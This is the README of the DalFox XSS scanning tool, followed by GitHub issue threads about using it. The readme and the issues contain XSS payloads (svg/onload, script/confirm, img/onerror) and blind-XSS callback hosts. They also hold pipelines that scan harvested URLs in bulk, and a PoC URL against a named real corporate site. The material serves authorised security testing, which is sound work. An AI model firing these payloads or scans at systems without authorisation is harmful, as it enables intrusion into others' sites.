🌘🦊 DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang

Overview


Finder Of XSS, and Dal(달) is the Korean pronunciation of moon.

What is DalFox 🌘 🦊

DalFox is a fast, powerful parameter analysis and XSS scanner, based on a golang/DOM parser. supports friendly Pipeline, CI/CD and testing of different types of XSS. I talk about naming. Dal() is the Korean pronunciation of moon and fox was made into Fox(Find Of XSS).

TOC

Key features

Mode: url sxss pipe file server

Class Key Feature Description
Discovery Parameter analysis - Find reflected param
- Find alive/bad special chars, event handler and attack code
- Identification of injection points(HTML/JS/Attribute)
inHTML-none inJS-none inJS-double inJS-single inJS-backtick inATTR-none inATTR-double inATTR-single
Static analysis - Check bad-header like CSP, XFO, etc.. with req/res base
BAV analysis - Testing BAV(Basic Another Vulnerability) , e.g sqli ssti open-redirects
Parameter Mining - Find new param with Dictonary attack (default is GF-Patterns)
- Support custom dictonary file (--mining-dict-word)
- FInd new param with DOM
Built-in Grepping - It Identify the basic info leak of SSTi, Credential, SQL Error, and so on
Scanning XSS Scanning - Reflected xss / stored xss
- DOM base verifying
- Blind XSS testing with param, header(-b , --blind options)
- Only testing selected parameters (-p, --param)
- Only testing parameter analysis (--only-discovery)
Friendly Pipeline - Single url mode (dalfox url)
- From file mode (dalfox file urls.txt)
- From IO(pipeline) mode (dalfox pipe)
- From raw http request file mode (dalfox file raw.txt --rawdata)
Optimizaion query of payloads - Check the injection point through abstraction and generated the fit payload.
- Eliminate unnecessary payloads based on badchar
Encoder - All test payloads(build-in, your custom/blind) are tested in parallel with the encoder.
- To Double URL Encoder
- To HTML Hex Encoder
Sequence - Auto-check the special page for stored xss (--trigger)
- Support (--sequence) options for Stored XSS , only sxss mode
HTTP HTTP Options - Overwrite HTTP Method (-X, --method)
- Follow redirects (--follow-redirects)
- Add header (-H, --header)
- Add cookie (-C, --cookie)
- Add User-Agent (--user-agent)
- Set timeout (--timeout)
- Set Delay (--delay)
- Set Proxy (--proxy)
- Set ignore return codes (--ignore-return)
- Load cookie from raw request (--cookie-from-raw)
Concurrency Worker - Set worker's number(-w, --worker)
N * hosts - Use multicast mode (--multicast) , only file / pipe mode
Output Output - Only the PoC code and useful information is write as Stdout
- Save output (-o, --output)
Format - JSON / Plain (--format)
Printing - Silence mode (--silence)
- You may choose not to print the color (--no-color)
- You may choose not to print the spinner (--no-spinner)
Extensibility REST API - API Server and Swagger (dalfox server)
Found Action - Lets you specify the actions to take when detected.
- Notify, for example (--found-action)
Custom Grepping - Can grep with custom regular expressions on response
- If duplicate detection, it performs deduplication (--grep)
Custom Payloads - Use custom payloads list file (--custom-payload)
- Custom alert value (--custom-alert-value)
- Custom alert type (--custom-alert-type)
Package Package manager - pkg.go.dev
- homebrew with tap
- snapcraft
Docker ENV - docker hub
- gitub package of docker

And the various options required for the testing :D

How to Install

From source

▶ GO111MODULE=on go get -v github.com/hahwul/dalfox/v2

Using homebrew (macos)

▶ brew tap hahwul/dalfox
▶ brew install dalfox

Using snapcraft (ubuntu)

▶ sudo snap install dalfox

More information? please read Installation guide

Usage

Modes: 
  file        Use file mode(targets list or rawdata)
  help        Help about any command
  pipe        Use pipeline mode
  server      Start API Server
  sxss        Use Stored XSS mode
  url         Use single target mode
  version     Show version

Global Flags:
Flags:
  -b, --blind string                Add your blind xss (e.g -b hahwul.xss.ht)
      --config string               Using config from file
  -C, --cookie string               Add custom cookie
      --cookie-from-raw string      Load cookie from burp raw http request (e.g --cookie-from-raw request.txt)
      --custom-alert-type string    Change alert value type (e.g =none / =str,none) (default "none")
      --custom-alert-value string   Change alert value (e.g custom-alert-value=document.cookie (default "1")
      --custom-payload string       Add custom payloads from file
  -d, --data string                 Using POST Method and add Body data
      --debug                       debug mode, save all log using -o option
      --delay int                   Milliseconds between send to same host (1000==1s)
      --follow-redirects            Following redirection
      --format string               Stdout output format(plain/json) (default "plain")
      --found-action string         If found weak/vuln, action(cmd) to next
      --grep string                 Using custom grepping file (e.g --grep ./samples/sample_grep.json)
  -H, --header string               Add custom headers
  -h, --help                        help for dalfox
      --ignore-return string        Ignore scanning from return code (e.g --ignore-return 302,403,404)
  -X, --method string               Force overriding HTTP Method (e.g -X PUT)
      --mining-dict                 Find new parameter with dictionary attack, default is Gf-Patterns=>XSS (default true)
      --mining-dict-word string     Custom wordlist file for param mining (e.g --mining-dict-word word.txt)
      --mining-dom                  Find new parameter in DOM (attribute/js value) (default true)
      --no-color                    Not use colorize
      --no-spinner                  Not use spinner
      --only-custom-payload         Only testing custom payload (required --custom-payload)
      --only-discovery              Only testing parameter analysis (same '--skip-xss-scanning' option)
  -o, --output string               Write to output file
  -p, --param string                Only testing selected parameters
      --proxy string                Send all request to proxy server (e.g --proxy http://127.0.0.1:8080)
      --silence                     Not printing all logs
      --skip-bav                    Skipping BAV(Basic Another Vulnerability) analysis
      --skip-grepping               Skipping built-in grepping
      --skip-mining-all             Skipping ALL parameter mining
      --skip-mining-dict            Skipping Dict base parameter mining
      --skip-mining-dom             Skipping DOM base parameter mining
      --skip-xss-scanning           Skipping XSS Scanning (same '--only-discovery' option)
      --timeout int                 Second of timeout (default 10)
      --user-agent string           Add custom UserAgent
  -w, --worker int                  Number of worker (default 100)

Server Flags:
  -h, --help          help for server
      --host string   Bind address (default "0.0.0.0")
      --port int      Bind Port (default 6664)
      
Pipe Flags:
  -h, --help        help for pipe
      --mass              Parallel scanning N*Host mode (show only poc code)
      --mass-worker int   Parallel worker of --mass and --multicast option (default 10)
      --multicast   Parallel scanning N*Host mode (show only poc code)
      
File Flags:
  -h, --help        help for file
      --http        Using force http on rawdata mode
      --mass              Parallel scanning N*Host mode (show only poc code)
      --mass-worker int   Parallel worker of --mass and --multicast option (default 10)
      --multicast   Parallel scanning N*Host mode (show only poc code)
      --rawdata     Using req rawdata from Burp/ZAP
      
SXSS Flags:
  -h, --help             help for sxss
      --mass             Testing mass vector (comming soon)
      --sequence int     Set sequence to first number (e.g --trigger https://~/view?no=SEQNC --sequence 3) (default -1)
      --trigger string   Checking this url after inject sxss code (e.g --trigger https://~~/profile)
▶ dalfox [mode] [flags] [data]

Single target mode

▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff -b https://hahwul.xss.ht

Multiple target mode from file

▶ dalfox file urls_file --custom-payload ./mypayloads.txt

Pipeline mode

▶ cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"

Other tips, See wiki for detailed instructions!

POC format

Sample poc log

[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E

Format

Identity Type Information BLANK PoC Code
POC G BUILT-IN/dalfox-error-mysql/GET http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
POC R GET http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
POC V GET http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
  • Type: G(Grep) , R(Reflected) , V(Verify)
  • Informatin: Method, grepping name, etc..

Why is there a gap? It is a method to make it easier to parse only the poc code through cut etc. For example, you can do this.

▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff | cut -d " " -f 2 > output
▶ cat output
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E

Screenshots

1414 1415
Single URL Scanning Massive(Multicast/Mass) Scanning
1416 1417
REST API Server Mode Output and Customizing (found-action / grepping)

Wiki

Wiki

Contribute

Contribute

Contributors

Comments
  • Dalfox uses the filename instead of it's content on the file mode

    Dalfox uses the filename instead of it's content on the file mode

    the tools seem to be loading the filename instead of its real content using the file mode. I'm using dalfox latest version. here are the commands I used:

    Command

    dalfox -b username.xss.ht file ~/tools/ParamSpider/output/target.com.txt
    

    Results:

    
        _..._
      .' .::::.   __   _   _    ___ _ __ __ 
     :  :::::::: |  \ / \ | |  | __/ \\ V / 
     :  :::::::: | o ) o || |_ | _( o )) (  
     '. '::::::' |__/|_n_||___||_| \_//_n_\                           
       '-.::''
    
    Parameter Analysis and XSS Scanning tool based on golang
    Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
    [*] Using file mode(targets list)
    [*] Loaded 0 target urls
    

    Second Command:

    dalfox -b username.xss.ht file test
    

    Results:

    
        _..._
      .' .::::.   __   _   _    ___ _ __ __ 
     :  :::::::: |  \ / \ | |  | __/ \\ V / 
     :  :::::::: | o ) o || |_ | _( o )) (  
     '. '::::::' |__/|_n_||___||_| \_//_n_\                           
       '-.::''
    
    Parameter Analysis and XSS Scanning tool based on golang
    Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
    [*] Using file mode(targets list)
    [*] Loaded 1 target urls
    [*] Target URL: test
    [E] not running Get lol: unsupported protocol scheme ""
    
    opened by DEMON1A 17
  • Blind XSS payload is ignored

    Blind XSS payload is ignored

    Summary

    Hello First of all thanks for the awesome tool , I wanted to make some BXSS attack oneliner and I used your tool to perform such action

    Description

    XSS get triggered but my blind XSS is ignored .. asciicast After visiting the links the payload used is not my BXSS payload

    Command

    echo "testphp.vulnweb.com" |  waybackurls | anti-burl | grep -Eo "https?://[^\"\\'> ]+" | grep "=" | grep -v ".jpg\|.png\|.css\|.js" | dalfox pipe -b https://sicksec.xss.ht
    

    Requirement go get -v github.com/tomnomnom/waybackruls go get -v github.com/tomnomnom/hacks/anti-burl

    System Config

    Ubuntu 18.04 Go1.14 Dalfox 1.1.2

    opened by Sicks3c 17
  • [@Headless] No result/PoC on known target (OWASP Juice Shop)

    [@Headless] No result/PoC on known target (OWASP Juice Shop)

    Question

    When I tried dalfox on real site, I only ever got up to [I] Reflected PATH messages but never got a [PoC] result or an output file, so I'm testing it on OWASP Juice Shop. The test is as follows:

    $ cat tmp
    http://localhost:3000/#/search?q=FUZZ
    
    $ dalfox file tmp -o dalfox.txt
    
        _..._
      .' .::::.   __   _   _    ___ _ __ __
     :  :::::::: |  \ / \ | |  | __/ \\ V /
     :  :::::::: | o ) o || |_ | _( o )) (
     '. '::::::' |__/|_n_||___||_| \_//_n_\
       '-.::''
    
    Parameter Analysis and XSS Scanning tool based on golang
    Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
    
     🎯  Target                 tmp
     🏁  Method                 GET
     🖥   Worker                 100
     🔦  BAV                    true
     ⛏   Mining                 true (Gf-Patterns)
     🔬  Mining-DOM             true (mining from DOM)
     ⏱   Timeout                10
     📤  FollowRedirect         false
     🕰   Started at             2021-06-09 21:13:18.114339628 +0700 +07 m=+0.007974295
    
     >>>>>>>>>>>>>>>>>>>>>>>>>
    [*] 🦊 Start scan [SID:0][0/1][0.00%%] / URL: http://localhost:3000/#/search?q=FUZZ
    [I] Found 0 testing point in DOM Mining
    [I] Content-Type is text/html; charset=UTF-8ter and static analysis 🔍
    [I] X-Frame-Options is SAMEORIGIN
    [I] Access-Control-Allow-Origin is *
    [*] Finish Scan
    
    $ ls
    tmp
    

    I've confirmed that the q parameter in the URL is vulnerable to XSS but dalfox is getting nothing. Am I doing something wrong?

    Environment

    • Dalfox Version: v2.3.7
    • Installed from: go-get
    • OWASP Juice Shop running with docker on localhost:3000
    question develope 
    opened by ChocolateOverflow 15
  • How to test only with custom XSS payload?

    How to test only with custom XSS payload?

    Hi, good work I have a question, I just cant make custom XSS payloads to work.

    by using dalfox url https://xss-game.appspot.com/level1/frame?query= -b https://keev.es/XSS.txt I will get

    [V] Triggered XSS Payload (found DOM Object): query=<scRipT class=dalfox>confirm(45)</script>
        13 line:  s were found for <b><scRipT class=dalfox>confirm(45)</script></b>. <a href='?'>T
    [POC][V][GET] https://xss-game.appspot.com/level1/frame?query=%3CscRipT+class%3Ddalfox%3Econfirm%2845%29%3C%2Fscript%3E
    

    it somehow always use Dalfox XSS payloads

    Any idea what I am doing wrong? Thank you 1

    question 
    opened by keev-studio 15
  • False positives

    False positives

    Hello again,

    I know there has already been one open inquiry regarding false positives but I am quite more curious about the current situation. Have you personally stumbled upon any? Recently, for instance, I might have possibly got one positive for an XSS but am not sure about it because in browser (only tested in the latest Chromium) it doesn't trigger the alert on load. What do you think?

    [V] Triggered XSS Payload (found DOM Object): callback='><sVg/onload=alert(45) class=dalfox> 1 line: FUZZ\'><sVg/onload=alert(45) class=dalfox>({"status":"ok","count":12,"count_tota

    My question therefore is, how can we distinguish that? Is it dependent on anything?

    Thank you very much in advance for your help and comment on this topic.

    opened by ghost 15
  • runtime error: invalid memory address or nil pointer dereference

    runtime error: invalid memory address or nil pointer dereference

    Hello,

    Getting same error as with your other tool (s3reverse) when piping through other commands:

    echo "redacted.com" | waybackurls | head -5 | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe -blind https://xxx.xss.ht/

    _..._
    

    .' .::::. __ _ _ ___ _ __ __ : :::::::: | \ / \ | | | / \ V / : :::::::: | o ) o || | | ( o )) (
    '. '::::::' |/|n||
    ||
    | _//n\
    '-.::''

    Parameter Analysis and XSS Scanning tool based on golang Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul [*] Using pipeline mode [*] Loaded 1 target urls [*] Target URL: http://www.redacted.com?cmp=701j000000096imaai [*] Vaild target [ code:200 / size:93822 ] [*] Start static analysis.. 🔍 [*] Start parameter analysis.. 🔍 ◓ Waiting routines.. panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x78b7af]

    goroutine 42 [running]: github.com/hahwul/dalfox/pkg/scanning.StaticAnalysis(0xc0000b40c0, 0x2c, 0xc0000a33e0, 0x1c) /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:463 +0x8f github.com/hahwul/dalfox/pkg/scanning.Scan.func1(0xc00018c0b4, 0xc0000a33e0, 0xc0000b40c0, 0x2c, 0xc0000bc080) /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:75 +0xb5 created by github.com/hahwul/dalfox/pkg/scanning.Scan /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:72 +0x342

    go version go1.13.5 linux/amd64

    bug develope exception 
    opened by ddervosj 15
  • delay not used for BAV

    delay not used for BAV

    Describe the bug

    The delay option is only used when testing for XSS and thus if BAV is not turned off, it would generate ~60 requests per parameter without delay. Now in some cases this might be enough to trigger a WAF and thus block requests from ip even after using the delay option.

    Environment

    • Dalfox Version: latest version
    • Installed from: go
    bug 
    opened by gauravnarwani97 14
  • Not adding any custom payload in path base xss

    Not adding any custom payload in path base xss

    Describe the bug

    I was trying to add my custom payload to dalfox, but It doesn't look to add any. Looking at the other output on GitHub it looks like it would tell me something like

    "[*] Added your 6 custom xss payload".
    

    It doesn't say that, and also checking in burpsuite for request, doesn't seem to add the custom payload to request. I've done many tests, but I'll use this vulnerable endpoint to show you:

    dalfox url "https://jobs.corporate.ford.com/List/Custom/Ford-Department"
    
    [POC][V][GET] https://jobs.corporate.ford.com/List/Custom/Ford-Department%22%3E%3Ciframe%20srcdoc=%22%3Cinput%20onauxclick=prompt%281%29%3E%22%20class=dalfox%3E%3C/iframe%3E?=
    

    So I've created a custom file payload like that (just to try):

    cat /tmp/dalfox_custom.txt                                                                                                                                                                          
    "><img src=x onerror=alert('test')>
    

    Then I run

    dalfox url "https://jobs.corporate.ford.com/List/Custom/Ford-Department" --custom-payload /tmp/dalfox_custom.txt --only-custom-payload --proxy http://127.0.0.1:8080
    

    Not only output doesn't show anything about adding payload, but I can't see any request regarding that on burpsuite

    Environment

    • Dalfox Version: 2.4.9
    • Installed from: go-get
    bug 
    opened by leorac 11
  • Panic: runtime error

    Panic: runtime error

    Describe the bug

    panic: runtime error: index out of range [2] with length 2
    
    goroutine 1 [running]:
    github.com/hahwul/dalfox/v2/pkg/scanning.Scan(0xc00002c100, 0x34, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
    	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/pkg/scanning/scan.go:197 +0x574e
    github.com/hahwul/dalfox/v2/cmd.glob..func2(0x19adbe0, 0xc000126620, 0x0, 0x2)
    	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/cmd/pipe.go:99 +0xb38
    github.com/spf13/cobra.(*Command).execute(0x19adbe0, 0xc000126600, 0x2, 0x2, 0x19adbe0, 0xc000126600)
    	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:856 +0x29d
    github.com/spf13/cobra.(*Command).ExecuteC(0x19ade60, 0x443cfa, 0x106d940, 0xc000000180)
    	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:960 +0x349
    github.com/spf13/cobra.(*Command).Execute(...)
    	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:897
    github.com/hahwul/dalfox/v2/cmd.Execute()
    	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/cmd/root.go:38 +0x31
    main.main()
    	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/dalfox.go:10 +0x20
    

    Environment

    • Dalfox Version: v2.3.6
    • Installed from: GO111MODULE=on go get -v github.com/hahwul/dalfox/v2
    bug 
    opened by edoardottt 11
  • Some ideas!

    Some ideas!

    Hi mate! I want to hear your opinion about some things.

    1. I believe the best option could be to move out the xss scanner to his own bav to have a better understanding of what you are trying to find. Then we can split again xss on differents bav modules for each type. (blind, etc). Whit this, we will also need to move detection and extra checks to his own files. I honestly feel that the code on scan.go is a bit complicated to follow.

    2. Would be great to have the possibility (via configuration or using a command-line flag ) to disable some feature like parameter mining, parameter analysis, or Static analysis. Sometimes you just want to test on the current parameter list and each default option adds a lot of extra HTTP queries and that could finish on your ip blocked/banned.

    let me know. :)

    opened by bp0lr 11
  • Problem using file

    Problem using file

    Hi. I am trying to start dalfox with a file containing all the URLs but unsuccessfully. I have tried almost anything, I always get this output:

    [*] Using file mode(targets list) [*] Loaded 0 target urls

    or

    [*] Using file mode(targets list) [*] Loaded 1 target urls [*] Target URL: /Downloads/domains.txt [E] not running Get /Downloads/domains.txt: unsupported protocol scheme ""

    I am trying dalfox file ./domains.txt or just domains.txt, full path, nothing works. You could probably add that to the readme. What should I do? It's a simple file like:

    domains.txt https://dfds.dfd https://dghkgsdkjg.dgdsg

    etc

    opened by ghost 11
  • Optionally include HTTP Request and Response in the JSON output

    Optionally include HTTP Request and Response in the JSON output

    It would be really helpful if we could optionally have the entire HTTP request and HTTP Response in the JSON output as well. I realize this could become very large but it would be super helpful for providing useful context for the reader. Perhaps as two different options: --output-request and --output-response.

    Feature request 
    opened by kmcquade 0
  • Include certain messages that are in the command line in the JSON output

    Include certain messages that are in the command line in the JSON output

    Hi, big fan of Dalfox here :) I noticed that there are some really helpful messages in the command line output that are not reflected in the JSON. Some of these could be really helpful in providing context on the vulnerabilities. For example, this part from pkg/scanning/scan.go

    if vStatus[v["param"]] == false {
      printing.DalLog("WEAK", "Reflected Payload in Attribute: "+v["param"]+"="+v["payload"], options)
    

    It would be really awesome if we could have the descriptions included in the JSON output! :)

    Feature request 
    opened by kmcquade 0
  • Bump github.com/spf13/cobra from 1.6.0 to 1.6.1

    Bump github.com/spf13/cobra from 1.6.0 to 1.6.1

    Bumps github.com/spf13/cobra from 1.6.0 to 1.6.1.

    Release notes

    Sourced from github.com/spf13/cobra's releases.

    v1.6.1

    Bug fixes 🐛

    • Fixes a panic when AddGroup isn't called before AddCommand(my-sub-command) is executed. This can happen within more complex cobra file structures that have many different inits to be executed. Now, the check for groups has been moved to ExecuteC and provides more flexibility when working with grouped commands - @​marckhouzam (and shout out to @​aawsome, @​andig and @​KINGSABRI for a deep investigation into this! 👏🏼)
    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
  • Bump github.com/stretchr/testify from 1.8.0 to 1.8.1

    Bump github.com/stretchr/testify from 1.8.0 to 1.8.1

    Bumps github.com/stretchr/testify from 1.8.0 to 1.8.1.

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
  • Bump github.com/swaggo/swag from 1.8.6 to 1.8.7

    Bump github.com/swaggo/swag from 1.8.6 to 1.8.7

    Bumps github.com/swaggo/swag from 1.8.6 to 1.8.7.

    Release notes

    Sourced from github.com/swaggo/swag's releases.

    v1.8.7

    Changelog

    f8d59d6 Bump golang.org/x/tools dependency version (#1338) 7f90377 Fix generics issue #1345 (#1349) e4f0129 chore: drop go1.15 support (#1331) 277a278 chore: increment version (#1350) 74e96c9 feat. add support formData []file (#1332) 04c699c fix issue #1346 about generics (#1348) 075c176 refactor: move from io/ioutil to io and os packages (#1334)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
  • Blind Payload Not Working in POST

    Blind Payload Not Working in POST

        I just realized this issue still persists when using "file --rawdata" with a post request.
    

    I think you fixed it for GET, but not POST.

    I see the Referrer header is working with the blind payload, but not the parameters in the data of the POST request

    Originally posted by @tekcap in https://github.com/hahwul/dalfox/issues/409#issuecomment-1279844573

    opened by tekcap 0
Releases(v2.8.2)
Owner
HAHWUL
Security Engineer and Developer and H4cker
HAHWUL
A scanner/exploitation tool written in GO, which leverages Prototype Pollution to XSS by exploiting known gadgets.

ppmap A simple scanner/exploitation tool written in GO which automatically exploits known and existing gadgets (checks for specific variables in the g

kleiton0x00 356 Nov 17, 2022
Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use.

Fast and customisable vulnerability scanner based on simple YAML based DSL. How • Install • For Security Engineers • For Developers • Documentation •

ProjectDiscovery 10.6k Nov 19, 2022
ARP spoofing tool based on go language, supports LAN host scanning, ARP poisoning, man-in-the-middle attack, sensitive information sniffing, HTTP packet sniffing

[ARP Spoofing] [Usage] Commands: clear clear the screen cut 通过ARP欺骗切断局域网内某台主机的网络 exit exit the program help display help hosts 主机管理功能 loot 查看嗅探到的敏感信息

Re 55 Nov 24, 2022
EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.

EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptograp

American Express 515 Nov 17, 2022
Naabu - a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner

Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply.

null 0 Jan 2, 2022
Portmantool - Port scanning and monitoring tool

portmantool Port scanning and monitoring tool Components runner while true do r

Thomann Bits & Beats 0 Feb 14, 2022
Session Cookie Finder

goSCF Session Cookie Finder - It helps you to find the main session cookie/s (upto 4) from the bunch of cookies, which is responsible for the user aut

Kamal Deep Bhati 8 May 28, 2022
Incident Response - Fast suspicious file finder

FastFinder - Incident Response - Fast suspicious file finder What is this project designed for? FastFinder is a lightweight tool made for threat hunti

Jean-Pierre GARNIER 165 Nov 24, 2022
A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.

PewSWITCH A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157. Related blog: https://0xinfection.github.io/p

Pinaki 24 Nov 2, 2022
A fully self-contained Nmap like parallel port scanning module in pure Golang that supports SYN-ACK (Silent Scans)

gomap What is gomap? Gomap is a fully self-contained nmap like module for Golang. Unlike other projects which provide nmap C bindings or rely on other

jtimperio 74 Nov 9, 2022
The dynamic infrastructure framework for everybody! Distribute the workload of many different scanning tools with ease, including nmap, ffuf, masscan, nuclei, meg and many more!

Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments, build and deploy repeatable infrastructure focussed on

pry0cc 3k Nov 27, 2022
Gryffin is a large scale web security scanning platform.

Gryffin (beta) Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems w

Yahoo 2.1k Nov 10, 2022
A Large killer focused on intranet scanning

FscanX 其实FscanX的灵感来源于fscan和LodanGo这两个开源项目,首先不得不说fscan和LadonGo两个都是非常优秀的内网扫描器。并且其独自的特色也让其在内网扫描器领域独占鳌头。其中LadonGo的插件式让其在扫描时更加专注,而fscan的傻瓜式则让其对内网的信息搜集更加高效。

SaiRson 203 Dec 31, 2021
WIP. Converts Azure Container Scan Action output to SARIF, for an easier integration with GitHub Code Scanning

container-scan-to-sarif container-scan-to-sarif converts Azure Container Scan Action output to Static Analysis Results Interchange Format (SARIF), for

Armel Soro 2 Jan 25, 2022
Wrapper to communicate with the wifi scanning protocol on Brother MFC-J430W

Brother MFC-J430W protocol wrapper (wifi scanner) Reasons Brother MFC-J430W has already scanner driver and you can download here but that are prebuilt

Andrea Maugeri 3 Sep 6, 2022
Go-basic-port-scanner: Scanning of TCP ports only

go-basic-port-scanner Scanning of TCP ports only. Usage git clone https://git

BenKF 1 Jan 22, 2022
null 0 Feb 2, 2022